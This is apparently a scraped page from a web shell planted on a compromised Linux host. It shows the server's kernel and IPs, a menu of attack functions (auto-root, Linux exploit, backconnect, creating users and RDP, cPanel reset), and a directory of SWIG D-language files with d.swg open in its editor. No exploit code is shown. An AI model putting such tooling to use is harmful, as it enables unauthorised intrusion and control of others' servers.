Linux vps-4302913.novaexata.com.br 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
swig /
2.0.10 /
d /
[ HOME SHELL ]
Name
Size
Permission
Action
boost_shared_ptr.i
8.03
KB
-rw-r--r--
carrays.i
2.51
KB
-rw-r--r--
cpointer.i
3.4
KB
-rw-r--r--
d.swg
1.32
KB
-rw-r--r--
dclassgen.swg
3.53
KB
-rw-r--r--
ddirectives.swg
466
B
-rw-r--r--
denums.swg
1.87
KB
-rw-r--r--
dexception.swg
1.15
KB
-rw-r--r--
dhead.swg
9.59
KB
-rw-r--r--
director.swg
1.2
KB
-rw-r--r--
dkw.swg
2.36
KB
-rw-r--r--
dmemberfunctionpointers.swg
2.67
KB
-rw-r--r--
doperators.swg
7.93
KB
-rw-r--r--
dprimitives.swg
4.5
KB
-rw-r--r--
dstrings.swg
2.51
KB
-rw-r--r--
dswigtype.swg
5.09
KB
-rw-r--r--
dvoid.swg
559
B
-rw-r--r--
std_common.i
102
B
-rw-r--r--
std_deque.i
28
B
-rw-r--r--
std_except.i
1.86
KB
-rw-r--r--
std_map.i
1.7
KB
-rw-r--r--
std_pair.i
703
B
-rw-r--r--
std_shared_ptr.i
68
B
-rw-r--r--
std_string.i
3.04
KB
-rw-r--r--
std_vector.i
16.07
KB
-rw-r--r--
stl.i
357
B
-rw-r--r--
typemaps.i
10.81
KB
-rw-r--r--
wrapperloader.swg
7.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : d.swg
/* ----------------------------------------------------------------------------- * d.swg * * Main library file for the D language module. See the D chapter in the SWIG * manual for explanation on the typemaps, pragmas, etc. used. * ----------------------------------------------------------------------------- */ // Typemaps for exception handling. %include <dexception.swg> // Typemaps for primitive types. %include <dprimitives.swg> // Typemaps for non-primitive types (C/C++ classes and structs). %include <dswigtype.swg> // Typemaps for enumeration types. %include <denums.swg> // Typemaps for member function pointers. %include <dmemberfunctionpointers.swg> // Typemaps for wrapping pointers to/arrays of C chars as D strings. %include <dstrings.swg> // Typemaps for handling void function return types and empty parameter lists. %include <dvoid.swg> // Typemaps containing D code used when generating D proxy classes. %include <dclassgen.swg> // Mapping of C++ operator overloading methods to D. %include <doperators.swg> // Helper code string and exception handling. %include <dhead.swg> // Wrapper loader code for dynamically linking the C wrapper library from the D // wrapper module. %include <wrapperloader.swg> // List of all reserved D keywords. %include <dkw.swg> // D-specific directives. %include <ddirectives.swg>
Close